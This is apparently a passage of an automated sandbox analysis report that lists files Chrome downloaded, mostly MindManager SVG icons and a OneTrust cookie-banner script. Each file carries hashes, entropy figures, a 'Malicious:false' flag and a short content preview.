                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 18.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="-0.5 -0.5 13.3 7.7" enable-background="new 0 0 12.3 6.7" xml:space="preserve">.<line fill="#5c707c" stroke="#3A52A4" stroke-width="1.5" stroke-linecap="round" stroke-miterlimit="10" x1="11.8" y1="0.5" x2="6.2" y2="6.1"/>.<line fill="#5c707c" stroke="#3A52A4" stroke-width="1.5" stroke-linecap="round" stroke-miterlimit="10" x1="0.5" y1="0.6" x2="6.1" y2="6.2"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):425
                                                                Entropy (8bit):5.200096612109495
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BFC1D2CBB3AAC35A4AA39B1C9A689529
                                                                SHA1:33DF591B2D2391D2D3B07BF588936696FE8AF8E5
                                                                SHA-256:D369F93165F3728A16B3F7756B86554D3122CAD0E5B7ACAB792FAFDC3938CF8A
                                                                SHA-512:873D91C4402254A2F3DFC3F1B10832C0039AB4886DBC9B219D955E6395D0359A61653AB2C30396A677A228B37DF29BF183DABF1A0B16CABADE6511F132F6405E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/star5.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18.15 17.38"><defs><style>.cls-1{fill:#fff;stroke:gray;stroke-miterlimit:10;}</style></defs><title>background_shape_Asset 75</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="6.59 6.19 8.96 1.13 11.54 6.09 17.08 6.77 13.16 10.76 14.22 16.24 9.22 13.75 4.34 16.45 5.16 10.93 1.08 7.11 6.59 6.19"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1543
                                                                Entropy (8bit):4.358945421921496
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:11E591823421A9C6CA9EABA0AA839B8F
                                                                SHA1:432A9E020CAAD4388782BAE8571394BFDAADCC82
                                                                SHA-256:0E5908DCF1D2B1B51668F070ACEAB25E1A4DBB9676DD7F6BCCF9F4B2153E1EE8
                                                                SHA-512:B4DE0A0D40818FDF68977C67D4760AC753A9798B9F7F0F7BC496585090B3E658DCA8786770D916F6B4E26A5E74FB9C4417666EFED99885F4513DCBBBD42D7064
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/navigation-panel/touch-move.svg
                                                                Preview:<svg width="57" height="65" viewBox="0 0 57 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M4 19L8 21.3094L8 16.6906L4 19ZM19 18.6L7.6 18.6L7.6 19.4L19 19.4L19 18.6Z" fill="#3B51A3"/>.<path d="M54 19L50 16.6906L50 21.3094L54 19ZM39 19.4L50.4 19.4L50.4 18.6L39 18.6L39 19.4Z" fill="#3B51A3"/>.<rect x="0.5" y="0.5" width="56" height="41" rx="2.5" stroke="#3B51A3"/>.<path d="M45.5011 34.7501C44.8624 34.7501 44.2569 34.9321 43.7345 35.2453C43.542 33.0097 41.6607 31.2501 39.3761 31.2501C38.4328 31.2501 37.5578 31.5502 36.8429 32.0595L37.626 16.3996C37.6627 15.0608 37.2533 13.8813 36.4728 13.0789C35.7861 12.3727 34.8611 12 33.798 12C30.8177 12 30.0889 14.9172 29.7774 16.1624C29.7669 16.2044 29.7598 16.2455 29.7555 16.2875L29 32.0595L27.9958 16.2796C27.5881 12.5557 25.3919 12 24.1187 12C21.8052 12 20.1261 13.8402 20.127 16.4065L20.7723 38.2501C20.7963 38.9467 20.7723 39.5182 20.7723 40.0254C20.5187 39.3914 19.5741 37.998 19.2328 37.6568L15.8825 34.3072C14.1754 32.5992 9.64982 32.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):61951
                                                                Entropy (8bit):4.1869835886386415
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B17E277C6114DE39292E4EC0E307A26F
                                                                SHA1:926A1B34261F973A8BA9BF26C21C9DB80FE22A5B
                                                                SHA-256:F7FB7F41290C739377AB70120214A4636BEF7A22180C215FE0981D7E373AAFF7
                                                                SHA-512:84C656EA24D715A4B0CDF010F5C99B1E937B3E572D20F7C63945432F6326E54BF756F6A172FEF0426E1B0C155AAE5148EAE014D86566F4090EEBEB88C0344EF3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_salesmanagement.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_4129)">..<rect width="200" height="250" rx="10" fill="#CCEBEA"/>..<g clip-path="url(#clip1_456_4129)">..<path d="M175.52 164.597C168.713 146.57 154.016 131.447 136.309 121.062C113.214 107.516 83.6167 101.723 57.4272 109.423C31.2377 117.123 10.1238 139.8 10.3698 164.633C10.488 176.567 16.2382 189.282 28.0028 194.761C39.3413 200.041 53.6013 197.627 65.0359 202.738C85.5218 211.895 89.2793 239.058 113.789 243.729C133.238 247.436 158.596 233.36 168.894 219.417C180.598 203.569 182.326 182.623 175.52 164.597Z" fill="#9BDDDB"/>..<path d="M51.808 211.028C43.5515 206.486 16.5022 204.074 20.9283 222.587C23.1 231.67 37.4833 227.395 40.2489 235.385C43.9644 246.118 59.9038 247.293 62.6657 234.53C63.9656 228.522 64.349 217.925 51.808 211.028Z" fill="#9BDDDB"/>..<path d="M173.034 79.2227H26.8662C21.3712 79.2227 16.9165 83.6773 16.9165 89.1724V184.798C16.9165 190.293 21.3712
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):958
                                                                Entropy (8bit):4.162448130078686
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EBF4C07E0F194A92BBA8284D8BF4B1C4
                                                                SHA1:3ECB871653BAC4F15329338713C3DA2AE37319AD
                                                                SHA-256:A66E6805710D3BAF66FE22F1AE376CB5019B78BA51080F0C59BACE5E3CF95F9A
                                                                SHA-512:FE6DAEC2742CE668857F471357600535B374E0677616ACBC36CD40B861508083EBC7E08A3178D8ABCA400C9CD2B719C6555250750FD8A5F1998AF1FF4911567C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/text-format-underline-new.svg
                                                                Preview:<svg viewBox="0 0 40 50" xmlns="http://www.w3.org/2000/svg">.<path d="M20.5102 35.336C19.4462 35.336 18.4848 35.1867 17.6262 34.888C16.7862 34.5707 16.0582 34.076 15.4422 33.404C14.8448 32.732 14.3782 31.8733 14.0422 30.828C13.7248 29.764 13.5662 28.476 13.5662 26.964V16.688H16.8142V27.216C16.8142 28.2053 16.8982 29.0453 17.0662 29.736C17.2528 30.408 17.5048 30.9493 17.8222 31.36C18.1582 31.7707 18.5502 32.0693 18.9982 32.256C19.4462 32.424 19.9502 32.508 20.5102 32.508C21.0702 32.508 21.5835 32.424 22.0502 32.256C22.5168 32.0693 22.9182 31.7707 23.2542 31.36C23.5902 30.9493 23.8515 30.408 24.0382 29.736C24.2248 29.0453 24.3182 28.2053 24.3182 27.216V16.688H27.4262V26.964C27.4262 28.476 27.2675 29.764 26.9502 30.828C26.6328 31.8733 26.1662 32.732 25.5502 33.404C24.9528 34.076 24.2248 34.5707 23.3662 34.888C22.5262 35.1867 21.5742 35.336 20.5102 35.336Z" fill="#000B36"/>.<path d="M11.3262 37.8H29.6662V39.2H11.3262V37.8Z" fill="#000B36"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):28
                                                                Entropy (8bit):4.208966082694623
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2144078565A802DEB0222A8348F5E764
                                                                SHA1:E5B20F8A0B2066619558ACCB12D2C6931170ED4A
                                                                SHA-256:11E70F0C5BE1151F7C014619A65D98C64A21D8DFB3FAC34765A628887C4EF46D
                                                                SHA-512:18D65DE6A5396C00603F5826731555AE3F5D3C8A6B16088A88C9C69CD1158F2583ED320F56EC0CDE5FB4136043BDEB38C05AFCAD715EEBA568D7B4DC78579159
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwkPaSrDON5ZHxIFDWdns_4SBQ2BkPF8?alt=proto
                                                                Preview:ChIKBw1nZ7P+GgAKBw2BkPF8GgA=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4076
                                                                Entropy (8bit):3.908719041946694
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BD64B70BCE2F790449F8B62F6A033C1C
                                                                SHA1:E023D558EAAB0F6CE262A6D01A3512F3483CC905
                                                                SHA-256:1F369FAB9CD946A999ABD3E29A11A053395D0E0127C8A989E335822A25568C30
                                                                SHA-512:EF25FC8484CDE000EA03C3C5AF4ED822C48D3030555E5B404FDF5D31849CD7D7C5DA0F181C4FAA0CEB8550D2CAA60E644E46868C81F3FE0ECDA23BC8D2E71851
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/settings-button.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 41 41"><defs><style>.cls-1{fill:#fff;stroke:#3a52a4;stroke-miterlimit:10;}.cls-2{fill:#3a52a4;}</style></defs><title>settings button</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="40" height="40" transform="translate(0 41) rotate(-90)"/><path class="cls-2" d="M18.27,30.52h-.06a9.06,9.06,0,0,1-1.32-.43,10.55,10.55,0,0,1-1.25-.62.5.5,0,0,1-.23-.3.47.47,0,0,1,0-.37,2,2,0,0,0,.24-1,2,2,0,0,0-.59-1.41,2.15,2.15,0,0,0-.63-.43,1.9,1.9,0,0,0-.78-.16,2,2,0,0,0-.49.06,2.18,2.18,0,0,0-.47.18.47.47,0,0,1-.37,0,.47.47,0,0,1-.29-.23,8.83,8.83,0,0,1-.62-1.24A10.43,10.43,0,0,1,11,23.32a.5.5,0,0,1,0-.37.5.5,0,0,1,.28-.24,2,2,0,0,0,0-3.79.46.46,0,0,1-.28-.23.5.5,0,0,1,0-.37A10.43,10.43,0,0,1,11.45,17a9.27,9.27,0,0,1,.63-1.25.47.47,0,0,1,.29-.22.5.5,0,0,1,.37,0,1.78,1.78,0,0,0,.47.19,2.09,2.09,0,0,0,.49.06,1.94,1.94,0,0,0,.78-.16,2.08,2.08,0,0,0,.63-.42,2,2,0,0,0,.59-1.41,2,2,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65451)
                                                                Category:downloaded
                                                                Size (bytes):440675
                                                                Entropy (8bit):5.35726756854569
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6B979743E4B75A88762893DFD587D6D7
                                                                SHA1:505BEC6656258A9D78A73033BF269DFCD96FA0E6
                                                                SHA-256:2E789E43937C7ABC5959EBA06825459F4E08E050FF9EA43AB8EC5A041A3E7558
                                                                SHA-512:D12106D03C8A91EB7C8BD59DFD0FF9D6459C83C078491BC279FED32BB95CA1118AD79CB7DF3C38F9F5C7E8775C0E2E374BE6EA7DDB0ABC7A81F414CACB343EEF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.cookielaw.org/scripttemplates/202402.1.0/otBannerSdk.js
                                                                Preview:/** . * onetrust-banner-sdk. * v202402.1.0. * by OneTrust LLC. * Copyright 2024 . */.!function(){"use strict";var x=function(e,t){return(x=Object.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,t){e.__proto__=t}:function(e,t){for(var o in t)Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o])}))(e,t)};function D(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function o(){this.constructor=e}x(e,t),e.prototype=null===t?Object.create(t):(o.prototype=t.prototype,new o)}var H,R=function(){return(R=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function F(e,s,a,l){return new(a=a||Promise)(function(o,t){function n(e){try{i(l.next(e))}catch(e){t(e)}}function r(e){try{i(l.throw(e))}catch(e){t(e)}}function i(e){var t;e.done?o(e.value):((t=e.value)instanceof a?t:new a(fun
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):604
                                                                Entropy (8bit):4.992330905928055
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:51A180D792AD0700DE1F855CFEACBE7D
                                                                SHA1:85AF18A475BEE70A0B793665807D2E7C1ECEB9ED
                                                                SHA-256:2F57242CA2917618DB4047469F9554696CE25A17E792192EC1AB34B08C32B67F
                                                                SHA-512:A80562D063E8DFC637D985EFECEC2C1EF61271BC088DBB770974638D24E07BB650C89B2146ABF65B3F90B605DEB9A540A5A494F3D5E3E38EC2040DEE61450DC6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-presentation/svg/presentation-next.svg
                                                                Preview:<svg . xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.51 14">. <defs>. <style>.cls-1{fill:#fff;stroke:#fff;stroke-miterlimit:10;}</style>. </defs>. <title>2018 Publish - next</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <path class="cls-1" d="M18.86,6.64a.51.51,0,0,1,0,.71l-6,6a.4.4,0,0,1-.16.11.55.55,0,0,1-.38,0,.4.4,0,0,1-.16-.11.5.5,0,0,1,0-.7L17.3,7.5H1a.49.49,0,0,1-.36-.15A.48.48,0,0,1,.5,7,.5.5,0,0,1,1,6.5H17.3L12.15,1.35A.48.48,0,0,1,12,1a.48.48,0,0,1,.15-.35.5.5,0,0,1,.7,0Z"/>. </g>. </g>.</svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):604
                                                                Entropy (8bit):5.099851954825333
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:109EDB81DFC9DA7444F823B0639E2B59
                                                                SHA1:8A7D1DC7549F2CAB8BCDB664544F45CD53AA4154
                                                                SHA-256:3F715B24E6B735A0BB351F318D857CBA69D70C6583C2D6DE347652752AFA1DAB
                                                                SHA-512:5CE3B43C722CF2F4E4E9FC96818B2D8D985CC5A6C542830676E7F149F5E2C60962DAB8771C8EAD1F5A0E33CFFA56CE6F1CEE55CD75E180AB33C0751CF2CD3938
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/padlock-unlocked.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#bc7f13;}.cls-3{fill:#9a9aa3;}</style></defs><title>unlocked_16</title><path class="cls-1" d="M0,11H16a0,0,0,0,1,0,0v3a2,2,0,0,1-2,2H2a2,2,0,0,1-2-2V11a0,0,0,0,1,0,0Z"/><circle class="cls-2" cx="7.5" cy="12.5" r="1.5"/><path class="cls-3" d="M2,7H14a2,2,0,0,1,2,2v1a0,0,0,0,1,0,0H0a0,0,0,0,1,0,0V9A2,2,0,0,1,2,7Z"/><rect class="cls-2" x="7" y="12" width="1" height="3" rx="0.5" ry="0.5"/><path class="cls-3" d="M6,5V4a2,2,0,0,1,4,0V5h2V4A4,4,0,0,0,4,4V7H6Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1108
                                                                Entropy (8bit):5.09632706188008
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8DFA4A47AB3C5F0151D9611A7F0FC880
                                                                SHA1:C6CD0F86EC2A6D0B991C8CCE987AA15A05B787A0
                                                                SHA-256:C1F8FE2110175AC80F0FF5E0D27BB1BBA10D1B66484B59B022A0759B2B1E6201
                                                                SHA-512:7BCEC4F6FBDB63EB61FFDFBD8653EEC5CC374939BECC7FDC961B8928FD44E7F2CEC175A83F38368AAA77D2A97DD4196442246E382A186F5D2E2AFC47DBE01E2C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/overlay-panel/saved.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 19.32 20.04"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#29a535;}.cls-3{fill:#d0f4d0;}.cls-4{fill:none;stroke:#29a535;stroke-miterlimit:10;stroke-width:1.43px;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M9,10H19V5.93L13.07,0H1A1,1,0,0,0,0,1V19a1,1,0,0,0,1,1H9Z"/><path class="cls-2" d="M4,1h9a0,0,0,0,1,0,0V4.56A2.44,2.44,0,0,1,10.56,7H6.44A2.44,2.44,0,0,1,4,4.56V1A0,0,0,0,1,4,1Z"/><rect class="cls-3" x="2.5" y="12" width="6" height="7.5"/><rect class="cls-3" x="10" y="2" width="1" height="4"/><path class="cls-2" d="M14,0H1.67A1.67,1.67,0,0,0,0,1.67v17S.25,20.33,1.17,20H9V19H1.42A.42.42,0,0,1,1,18.58V1.42A.42.42,0,0,1,1.42,1H14l4,4v5h1V5Z"/><path class="cls-4" d="M2.5,20V13.62c0-1.17.47-2.12,1-2.12H9"/><path class="cls-2" d="M18.57,12.12a.19.19,0,0,0-.33,0l-3.57,4.73a.2.2,0,0,1-.34,0l-1.56-2.12a.28.28,0,0,0-.17-.1.22.22,0,0,0-.17.1l-.69.83a.34.34,0,0,0-.07.22.37.37,0,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1475
                                                                Entropy (8bit):4.801185839176468
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7A53ACD0D6C2FBED2C77E35A21E38A8D
                                                                SHA1:6CCDE17D143212E5265F48693E5EEE520D10F681
                                                                SHA-256:B62E24BCB83C89BE446E075936EA20D4BB6530B497757007740E83487FADE9B8
                                                                SHA-512:CE758186AC7A50B327E69EDB313D18221E46978900D08E70C74B862B743014F739EB4E3BE11BC85DE9955A5C4338E9401BF09C24BAC34E9C6ACED00D9067E0F8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/asking5whys.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M22 14.002H42.9998V26.7518H23C22.4477 26.7518 22 26.3041 22 25.7518V14.002Z" fill="#DFF1FD"/>.<path d="M42.999 26.752H63.9988V38.7518H43.999C43.4467 38.7518 42.999 38.3041 42.999 37.7518V26.752Z" fill="#DFF1FD"/>.<path d="M63.999 38.7539H84.9988V50.7538H64.999C64.4467 50.7538 63.999 50.3061 63.999 49.7538V38.7539Z" fill="#DFF1FD"/>.<path d="M85 50.75H106V63.4999H86C85.4477 63.4999 85 63.0521 85 62.4999V50.75Z" fill="#DFF1FD"/>.<path d="M105.998 63.5039H126.998V75.5038H106.998C106.446 75.5038 105.998 75.0561 105.998 74.5038V63.5039Z" fill="#DFF1FD"/>.<path d="M127 75.502H148V86.5018C148 87.0541 147.552 87.5018 147 87.5018H128C127.448 87.5018 127 87.0541 127 86.5018V75.502Z" fill="#FAEABF"/>.<path d="M22 3C22 2.44772 22.4477 2 23 2H41.9998C42.552 2 42.9998 2.44772 42.9998 3V14.7499H22V3Z" fill="#FAEABF"/>.<path d="M42.999 14.75H62.9988C63.5511 14.75 63.9988 15.1977 63.9988 15.75V26.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):683
                                                                Entropy (8bit):5.2482198294768825
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1F9E621EA18BA4C153A2DF5565E12018
                                                                SHA1:C8BD9907CB6E6A90826CD501DA831B5FE7825C89
                                                                SHA-256:ACBF7CFA42312A6DF7B17FC7898634175703ACF90302CF897E0F0554FC5298D3
                                                                SHA-512:0D0939E1096F17C2774B4E5AE13C3A1E0CEB9C00B5C4DA83ED993EA49A3A992B71C7D7B17F00D47D869F550E4F5483D246F7765F157D636405BFAF1307923A6D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_add_floating_topic.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 22"><defs><style>.cls-1{fill:#96be7d;stroke:#63a558;stroke-miterlimit:10;}.cls-2{fill:#fff;}.cls-3{fill:#63a558;}</style></defs><title>web app toolbar assets add floating topic</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="23" height="21" rx="4"/><polygon class="cls-2" points="10.5 14.5 10.5 12.5 8.5 12.5 8.5 9.5 10.5 9.5 10.5 7.5 13.5 7.5 13.5 9.5 15.5 9.5 15.5 12.5 13.5 12.5 13.5 14.5 10.5 14.5"/><path class="cls-3" d="M13,8v2h2v2H13v2H11V12H9V10h2V8h2m1-1H10V9H8v4h2v2h4V13h2V9H14V7Z"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1352
                                                                Entropy (8bit):5.199892906391091
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2EEDA595344E9F9CD5D9BFB3FE568FF1
                                                                SHA1:CC4C2FDB656B77596E9D539F6E4607C72AA0BD3B
                                                                SHA-256:1C8487C671557C63BB832A6473E49E2976C18C800BC140EFDEC76DD52ED6970C
                                                                SHA-512:A245D218C3E6762C8DD0F20E11249C4104A52DB3EA4DC91319AA3F824548E1E8A566ADEE08A348C605828CB20F7C2D1E239ABFB7422D55FD8B048B2D1578F872
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-terminal-fit.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="60.7px"... height="36px" viewBox="0 0 60.7 36" enable-background="new 0 0 60.7 36" xml:space="preserve">..<g id="home">..</g>..<g id="save">..</g>..<g id="export">..</g>..<g id="edit">..</g>..<g id="copy">..</g>..<g id="paste">..</g>..<g id="cut">..</g>..<g id="delete">..</g>..<g id="add_floating">..</g>..<g id="add_sibling">..</g>..<g id="add_child">..</g>..<g id="add_callout">..</g>..<g id="add_image">..</g>..<g id="add_link">..</g>..<g id="add_attachment">..</g>..<g id="add_tag">..</g>..<g id="add_resource">..</g>..<g id="add_due_date">..</g>..<g id="add_progress">..</g>..<g id="undo">..</g>..<g id="redo">..</g>..<g id="customize_ui">..</g>..<g id="open_accordian_menu">..</g>..<g id="close_accordian_menu">..</g>..<g id="other">...<
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):785
                                                                Entropy (8bit):4.807029806466606
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A7BB7FFF54A364A827E702431CFEE079
                                                                SHA1:B7B54CDE6B7A6BF54215DF8DC69429F2B6E0C623
                                                                SHA-256:78C01BBC1A2D4BE42BFCCC41500F24316A7150B2150AEE23CFF26B1615BD1EBD
                                                                SHA-512:F21B08ECD523651E2198946EF78F4F9901A85A5C2DD94CD3126A99AB45A1A8F88F07885FB1E3A1C5C7A8ECC8BAFF84FCF2D78835A967337135DBC6F598712488
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/camera.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#666;}.cls-2{fill:gray;}.cls-3{fill:#fff;}.cls-4{fill:#1c97e6;}.cls-5{fill:#f2f2f2;}</style></defs><title>camera_16</title><rect class="cls-1" y="3" width="16" height="11" rx="2" ry="2"/><rect class="cls-1" x="1" y="1" width="5" height="4" rx="1.25" ry="1.25"/><rect class="cls-2" y="3" width="16" height="11" rx="2" ry="2"/><circle class="cls-1" cx="8" cy="9" r="4"/><circle class="cls-3" cx="8" cy="8" r="4"/><circle class="cls-1" cx="8" cy="8" r="3"/><circle class="cls-3" cx="7" cy="7" r="1"/><rect class="cls-4" x="8" y="7" width="1" height="2"/><rect class="cls-5" x="13" y="5" width="2" height="1"/><rect class="cls-1" x="13" y="4" width="2" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2678
                                                                Entropy (8bit):4.580994255223854
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:78C426A29F8B74CCD8349ED100B546B8
                                                                SHA1:56B4429A512F04A6DB12DB2588D6FE21E31272D8
                                                                SHA-256:D79946676986216C354897A27C76EA4CF2AC7650ED0C55D0447B45CB68670B89
                                                                SHA-512:89AAF20A50D68771EB544643D0C503B89C04C6EDF583D3BA9B5B43E0B10785A829219AD873BCFEB5422FC005495E4778B65B60D4C882DF67EFD030656C8F5D4C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/delete.svg
                                                                Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_352_9506)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M1.25 4.25C1.25 3.97386 1.47386 3.75 1.75 3.75H14.25C14.5261 3.75 14.75 3.97386 14.75 4.25C14.75 4.52614 14.5261 4.75 14.25 4.75H1.75C1.47386 4.75 1.25 4.52614 1.25 4.25Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M2.9644 3.75129C3.23984 3.73162 3.47908 3.93896 3.49875 4.2144L4.12375 12.9644C4.1246 12.9763 4.12502 12.9881 4.12502 13C4.12502 13.1499 4.205 13.3416 4.3692 13.5058C4.5334 13.67 4.72514 13.75 4.87502 13.75H11.125C11.2749 13.75 11.4666 13.67 11.6308 13.5058C11.795 13.3416 11.875 13.1499 11.875 13C11.875 12.9881 11.8754 12.9763 11.8763 12.9644L12.5013 4.2144C12.521 3.93896 12.7602 3.73162 13.0356 3.75129C13.3111 3.77097 13.5184 4.0102 13.4988 4.28565L12.8749 13.0197C12.8686 13.4871 12.6383 13.9126 12.3379 14.213C12.0334 14.5175 11.6001 14.75 11.125 14.75H4.87502C4.39991 14.7
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):667
                                                                Entropy (8bit):5.124365468951568
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FDAE1A424850887197DA249296CEE36F
                                                                SHA1:6AFD1CC231FF5B2801A395E353A4B7A8B1288F01
                                                                SHA-256:5325EA91356F4E7E4C451957A235C4CFD5A308F5865679B9341F0BFF258596F6
                                                                SHA-512:B9CFBBA837BB7502BD982F798B8EFC61BBB725821562C7C8CEF46C30533768396805B2ECBE9A8794F853ECE33F94D156C02FF3B10494C4CAF0012DBD1D4DF141
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priority07.svg
